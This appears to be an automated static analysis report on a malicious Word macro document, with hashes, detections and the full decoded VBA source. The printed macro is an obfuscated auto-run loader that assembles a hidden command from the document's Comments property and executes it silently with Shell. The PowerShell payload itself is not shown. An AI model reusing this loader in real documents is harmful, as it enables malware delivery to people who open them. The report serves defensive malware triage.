Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a8b91fac4cdd922…

MALICIOUS

Office (OLE)

80.0 KB Created: 2017-10-10 15:18:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: ad5e86b1068b0906113e5af24b22ba98 SHA-1: 98010df0a368151f9d831d3e18e957137600d142 SHA-256: 5a8b91fac4cdd9220dae03dc4160d8d77fb509482d14370da38227b5de7ee639
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and triggers a Shell() call, which in turn references PowerShell. This indicates the macro is designed to execute a PowerShell command, likely for downloading and executing a secondary payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    RzUZw = CoZOW + BpJpC + ZqZrnHsLvj + vnTpSnFfnL + zdTXN
VBA.Shell$ RzUZw, 0
End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
OpwUzGpsi
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8036 bytes
SHA-256: cbf36fd7a0e1d37337e08c537a4fdb629150fe4404a257de4ba34ae3f42542b2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
46 of 78 identifiers look randomly generated (e.g. 'TWcBopNmQKL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub OpwUzGpsi()
WPDEKviRwz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7535), 45)
vsFPPsPsYG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1443), 69)
GjLDzAW = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18048), 8)
dvBNtm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13233), 101)
NDUCXtsGz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 16318), 52)
PpSQzlw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5206, 186)
bRvbjjSwE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3371), 121)
GjOLDzQ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15005), 191)
TzCqFATLfE = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4401), 38)
KvCvHtVrbvC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15812), 61)
KfbHMAUPmQ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6284, 143)
FVjMHRz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 798), 191)
vnMPvDur = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7564), 189)
vFBvUsDS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18178, 34)
fYfYf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3063), 167)
piTiCWOO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1195, 172)
rRwaYX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17332, 18)
JEZLUDzvR = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2714), 176)
IoktfFMu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18829), 127)
jmjddMBHhGB = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 18905), 75)
VwwdKQfGEU = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3934, 92)
aHXQUMdzp = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8070), 128)
tiqqznk = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14058), 28)
WwOvhcC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8693, 143)
miSouD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4191), 137)
rNuXmAujF = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15415), 143)
ZhSUjWL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12926, 39)
bjrKzlCwzEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2290, 23)
UwXtzkwTPc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10477, 18)
DhTKlRjaM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13956), 67)
VjXAzw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13455), 85)
HfoMW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4922, 103)
YbiZMHKbwE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12291), 15)
NnENZSoCJa = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4701, 110)
UhbZD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15908), 185)
zNzsIwm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2351, 51)
KIbvO = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11730), 63)
NDSOuhu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9377), 52)
qdEifkYjklY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16910, 63)
wQncnrBzolI = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13630), 88)
WkAZQT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7187), 11)
EcIUJvO = WPDEKviRwz + vsFPPsPsYG + GjLDzAW + dvBNtm + NDUCXtsGz + PpSQzlw + bRvbjjSwE + GjOLDzQ + TzCqFATLfE + KvCvHtVrbvC + KfbHMAUPmQ + FVjMHRz + vnMPvDur + vFBvUsDS + fYfYf + piTiCWOO + rRwaYX + JEZLUDzvR + IoktfFMu + jmjddMBHhGB + VwwdKQfGEU + aHXQUMdzp + tiqqznk + WwOvhcC + miSouD + rNuXmAujF + ZhSUjWL + bjrKzlCwzEn + UwXtzkwTPc + DhTKlRjaM + VjXAzw + HfoMW + YbiZMHKbwE + NnENZSoCJa + UhbZD + zNzsIwm + KIbvO + NDSOuhu + qdEifkYjklY + wQncnrBzolI + WkAZQT
WQvuOa = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3679, 82)
ELzOBHiMScD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17862), 152)
blKuajbHVAE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16573, 17)
wpwFP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14352, 198)
YNGTqaA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8143), 134)
dliDIvikAor = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16737, 108)
jKsIzJsQMN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7277, 93)
aNiqE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12725, 169)
oKsOaCtDK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11387), 85)
bfKld = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11012), 161)
ibrtjQYz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11814), 59)
hAuvpJUcr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3870), 84)
FFFiEGl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5035), 162)
pjiOWXqvib = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 366), 14)
zLVKRKlV = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2039), 141)
mzJcWl = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6010), 75)
KmwLswRf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8855, 186)
SZwQGqF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5462, 50)
XmwAfBjzj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9498, 124)
TWcBopNmQKL = EcIUJvO + WQvuOa + ELzOBHiMScD + blKuajbHVAE + wpwFP + YNGTqaA + dliDIvikAor + jKsIzJsQMN + aNiqE + oKsOaCtDK + bfKld + ibrtjQYz + hAuvpJUcr + FFFiEGl + pjiOWXqvib + zLVKRKlV + mzJcWl + KmwLswRf + SZwQGqF + XmwAfBjzj
fROqwzCK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6024, 66)
MiALhclV = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18663), 189)
mXZCuMDROd = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10067, 30)
CoZOW = TWcBopNmQKL + fROqwzCK + MiALhclV + mXZCuMDROd
BpJpC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6849), 140)
ZqZrnHsLvj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4821), 5)
vnTpSnFfnL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4182, 1)
zdTXN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9316, 1)
RzUZw = CoZOW + BpJpC + ZqZrnHsLvj + vnTpSnFfnL + zdTXN
VBA.Shell$ RzUZw, 0
End Sub
Sub AutoOpen()
OpwUzGpsi
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.